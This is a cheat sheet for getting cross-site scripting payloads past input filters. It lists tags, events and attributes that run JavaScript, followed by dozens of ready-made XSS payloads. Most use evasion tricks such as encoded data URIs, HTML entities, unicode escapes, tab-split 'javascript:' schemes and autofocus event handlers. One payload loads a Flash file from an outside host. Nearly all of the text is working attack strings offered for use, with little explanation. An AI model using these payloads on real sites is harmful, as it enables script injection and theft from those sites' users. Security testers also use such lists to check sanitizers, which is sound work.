Bypassing XSS filters

In the XSS world, there are many tags, events, attributes can be used to execute js.

  • Tag can execute js
    <script> <a> <p> <img> <body> <button> <var> <div> <iframe> <object> <input> <select> <textarea> <keygen> <frameset> <embed> <svg> <math> <video> <audio>
  • The events are execute js:

    onload onunload onchange onsubmit onreset onselect onblur onfocus onabort onkeydown onkeypress onkeyup onclick ondbclick onmouseover onmousemove onmouseout onmouseup onforminput onformchange ondrag ondrop

  • Properties can execute
    formaction action href xlink:href autofocus src content data

Bypassing

  • Use any tag for bypassing  harm tag blacklist
    <M/onclick=”alert(1)”>M
  • use “/” instead of spaces
    <img/src=x onerror=alert(1)>
  • use short xss payload
    <b/ondrag=alert()>M
  • data URI
    <a href=javascript:alert(2)>M
    <a href=data:text/html;base64,PHNjcmlwdD5hbGVydCgzKTwvc2NyaXB0Pg==>
    <a href=data:text/html;%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2829%29%3C%2F%73%63%72%69%70%74%3E>M
    <a href=j&#x61;v&#97script&#x3A;&#97lert(13)>M
    <a href=javascript&colon;confirm(2)>M
  • combination to xlink:href
    <svg><a xlink:href=”javascript:alert(14)”><rect width=”1000″ height=”1000″ fill=”white”/></a></svg>
    <math><a xlink:href=javascript:alert(1)>M
  • script tag
    <script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>
    <script firefox>alert(1)</script>
    <script>~’\u0061′ ;  \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073.  \u0061\u006C\u0065\u0072\u0074(~’\u0061′)</script> //
    <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script>
    <script>prompt(-[])</script>
    <script>alert(String.fromCharCode(49))</script>
    <script>alert(/7/.source)</script>
    <script>setTimeout(‘alert(1)’,0)</script>
  • button tag & html5
    <button/onclick=alert(1) >M</button>
    <form><button formaction=javascript&colon;alert(1)>M
    <button onfocus=alert(1) autofocus>
  • <p> tag
    <p/onmouseover=javascript:alert(1); >M</p>
  • <img> tag
    <img src ?itworksonchrome?\/onerror = alert(1)>
    <img src=x onerror=window.open(‘http://google.com’);>
    <img/src/onerror=alert(1)>
    <img src=”x:kcf” onerror=”alert(1)”>
  • <body> tag
    <body onload=alert(1)>
    <body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
  • <var> tag
    <var onmouseover=”prompt(1)”>KCF</var>
  • <div> tag
    <div/onmouseover=’alert(1)’>X
    <div style=”position:absolute;top:0;left:0;width:100%;height:100%” onclick=”alert(52)”>
  • <iframe> tag
    <iframe  src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
    <iframe  src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
    <iframe SRC=”http://0x.lv/xss.swf”></iframe>
    <IFRAME SRC=”javascript:alert(1);”></IFRAME>
    <iframe/onload=alert(53)></iframe>
  • <meta> tag
    <meta http-equiv=”refresh” content=”0;javascript&colon;alert(1)”/>?
    <meta http-equiv=”refresh” content=”0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E”>
  • <object> tag
    <object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object>
  • <marquee> tag
    <marquee  onstart=”alert(‘sometext’)”></marquee>
  • <isindex> tag
    <isindex type=image src=1 onerror=alert(1)>
    <isindex action=javascript:alert(1) type=image>
  • <input> tag
    <input onfocus=javascript:alert(1) autofocus>
    <input onblur=javascript:alert(1) autofocus><input autofocus>
  • <select> tag
    <select onfocus=javascript:alert(1) autofocus>
  • <textarea> tag
    <textarea onfocus=javascript:alert(1) autofocus>
  • <keygen> tag
    <keygen onfocus=javascript:alert(1) autofocus>
  • <frameset> tag
    <FRAMESET><FRAME SRC=”javascript:alert(1);”></FRAMESET>
    <frameset onload=alert(1)>
  • <embed> tag
    <embed src=”data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=”></embed> //chrome
    <embed src=javascript:alert(1)> //firefox
  • <svg> tag
    <svg onload=”javascript:alert(1)” xmlns=”http://www.w3.org/2000/svg”></svg>
    <svg xmlns=”http://www.w3.org/2000/svg”><g onload=”javascript:alert(1)”></g></svg>
  • <math> tag
    <math href=”javascript:javascript:alert(1)”>CLICKME</math>
    <math><y/xlink:href=javascript:alert(51)>test1
    <math> <maction actiontype=”statusline#http://wangnima.com”
    xlink:href=”javascript:alert(49)”>CLICKME</maction> </math>
  • <video> tag
    <video><source onerror=”alert(1)”>
    <video src=x onerror=alert(48)>
  • <audio> tag
    <audio src=x onerror=alert(47)>